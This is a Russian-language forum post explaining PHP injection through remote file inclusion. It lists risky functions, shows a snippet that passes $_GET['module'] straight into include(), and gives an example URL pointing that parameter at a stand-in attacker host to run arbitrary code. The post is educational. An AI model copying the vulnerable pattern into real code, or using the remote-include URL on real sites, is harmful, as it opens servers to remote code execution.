компьютерный форум
Вернуться   Компьютерный форум > Программирование и вебстроительство > Программирование > Заказы на разработку ПО и сайтов > Защита информации > Интернет ресурсы

Ответ
 
LinkBack Опции темы Опции просмотра
Старый 04.01.2011, 14:22   #1
Пользователи
 
Регистрация: 21.12.2007
Сообщений: 161
Thumbs up Php иньекции

PHP-инъекция (англ. PHP injection) — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне. Потенциально опасными функциями являются:

-eval(),
-preg_replace() (с модификатором «e»),
-require_once(),
-include_once(),
-include(),
-require(),
-create_function().

PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

Пример
PHP код:

<?
...
$module $_GET['module'];
include (
$module.'.php');
...
?>
Этот скрипт уязвим, так как к содержимому переменной $module просто прибавляется «.php» и по полученному пути подключается файл.

Взломщик может на своём сайте создать файл, содержащий PHP-код (http://hackersite.com/inc.php), и зайдя на сайт по ссылке вроде http://mysite.com/index.php?module=h...ersite.com/inc выполнить любые PHP-команды.




семенчик вне форума  
Digg this Post!Bookmark Post in Technorati
Ответить с цитированием
04.01.2011, 14:22
Техник
реклама
Thumbs up Php иньекции

Ответ


Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.



Текущее время: 00:48. Часовой пояс GMT.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot
Content Relevant URLs by vBSEO 3.5.0 RC2